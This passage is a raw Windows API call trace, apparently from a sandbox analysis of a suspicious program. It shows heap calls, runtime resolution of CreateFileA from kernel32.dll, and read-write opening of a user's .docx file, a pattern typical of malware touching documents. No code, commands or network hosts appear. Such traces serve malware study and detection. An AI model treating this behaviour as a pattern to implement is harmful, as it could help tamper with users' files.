Size=0x4) returned 0x8e1a30 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0175.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.263] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0175.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba078 [0175.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba078, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0175.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.264] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0175.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.264] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.264] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0175.264] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.265] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0175.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0175.266] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db0a8 [0175.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", cchWideChar=61, lpMultiByteStr=0x8db0a8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx", lpUsedDefaultChar=0x0) returned 61 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0175.266] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nqzsz9xcqqe d7p.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0175.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0175.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7a) returned 0x9c0b78 [0175.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=61, lpWideCharStr=0x9c0b78, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.docx") returned 61 [0175.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0175.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0175.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0175.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.285] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0175.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.287] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0175.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0175.288] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0175.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0175.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.288] HeapFree (in: 